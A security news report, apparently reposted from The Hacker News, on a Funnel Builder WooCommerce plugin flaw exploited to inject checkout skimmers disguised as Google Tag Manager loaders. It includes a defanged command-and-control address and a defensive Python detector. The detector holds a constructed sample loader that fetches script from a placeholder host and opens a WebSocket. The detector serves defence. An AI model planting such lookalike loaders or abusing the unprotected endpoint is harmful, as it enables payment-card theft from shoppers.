HackMyIP
2026-05-16 The Hacker News

WooCommerce Funnel Builder Flaw Under Exploitation Enables Checkout Skimming

Vulnerability, Zero-Day, Malware

A critical vulnerability in the Funnel Builder plugin for WordPress, used by over 40,000 WooCommerce stores, is being actively exploited to inject malicious JavaScript into checkout pages, allowing attackers to steal payment data. The flaw, which has no official CVE identifier, affects all versions prior to 3.15.0.3. Sansec researchers documented the campaign this week, noting that attackers are abusing an unprotected endpoint to write arbitrary script content into the plugin's external scripts setting.

The exposed endpoint, present in older releases, never validated caller permissions or restricted which internal methods could be invoked. By sending an unauthenticated request to the endpoint, a threat actor can reach an internal method that directly stores attacker‑controlled data in the plugin’s global settings. The injected payload mimics a standard Google Tag Manager loader, making it look like ordinary analytics to reviewers while loading a payment skimmer that captures credit‑card numbers, CVVs and billing addresses on every transaction. FunnelKit, the developer behind Funnel Builder, released patch version 3.15.0.3 to address the issue.

In observed attacks, the malicious script opens a WebSocket connection to a command‑and‑control server at wss://protect‑wss[.]com/ws, retrieving a customized skimmer tailored to the compromised storefront. This technique aligns with classic Magecart tactics, where skimmers disguise themselves as familiar tracking tags to avoid detection. The resulting data exfiltration can lead to financial fraud and expose customers to identity theft.

Site owners should update Funnel Builder to version 3.15.0.3 immediately and audit Settings > Checkout > External Scripts, removing any unfamiliar entry without delay. Additional checks, such as running an SSL/TLS checker to verify certificate integrity, scanning for exposed services with a port scanner, and confirming through an email breach checker whether any email credentials have been compromised, can help reduce risk and detect fallout from this campaign.
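A defender-side check matching the audit step above, added here as an example and not code from Sansec, FunnelKit or The Hacker News: it scans each External Scripts entry for a loader that looks like the standard Google Tag Manager snippet but fetches script from a foreign host, and for any WebSocket URL, which an analytics tag has no reason to open on a checkout page. The two sample entries are constructed, and the `.invalid` domains are placeholders standing in for the real command-and-control host.

```python
import re
from urllib.parse import urlparse

# Hosts a genuine Google Tag Manager loader is expected to contact.
GTM_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}
# Any absolute URL in an entry, including WebSocket (ws/wss) endpoints.
URL_RE = re.compile(r"(?:https?|wss?)://[^\s'\"<>)]+", re.IGNORECASE)
# Strings that make a snippet look like the standard GTM loader.
GTM_MARKERS = ("googletagmanager", "gtm.js", "datalayer")

def find_suspicious_loaders(entry, allowed_hosts=frozenset()):
    """Return (reason, url) findings for one External Scripts entry.

    Flags (1) a GTM-looking loader that fetches script from a host other
    than googletagmanager.com and (2) any ws:// or wss:// URL, which an
    analytics tag has no legitimate reason to open from a checkout page."""
    lowered = entry.lower()
    looks_like_gtm = any(m in lowered for m in GTM_MARKERS)
    findings = []
    for url in URL_RE.findall(entry):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if parsed.scheme.lower() in ("ws", "wss"):
            findings.append(("websocket_in_tag", url))
        elif looks_like_gtm and host not in GTM_HOSTS and host not in allowed_hosts:
            findings.append(("gtm_lookalike_foreign_host", url))
    return findings

def audit_external_scripts(entries, allowed_hosts=frozenset()):
    """Map entry index -> findings for every entry that raised at least one."""
    report = {}
    for i, entry in enumerate(entries):
        hits = find_suspicious_loaders(entry, allowed_hosts)
        if hits:
            report[i] = hits
    return report

# Constructed sample entries (hypothetical; .invalid domains stand in for real C2).
BENIGN_GTM = """<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>"""
LOOKALIKE_SKIMMER_LOADER = """<script>(function(w,d,s,l,i){w[l]=w[l]||[];
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.src='https://cdn.tagdelivery.invalid/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
new WebSocket('wss://ws.tagdelivery.invalid/ws');
})(window,document,'script','dataLayer','GTM-ABC123');</script>"""

if __name__ == "__main__":
    for idx, hits in audit_external_scripts([BENIGN_GTM, LOOKALIKE_SKIMMER_LOADER]).items():
        for reason, url in hits:
            print(f"entry {idx}: {reason}: {url}")
```

Feed it the actual entries exported from the plugin setting, and pass any first-party tag CDN you knowingly use as `allowed_hosts` so only unexpected hosts are reported.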

Source: The Hacker News
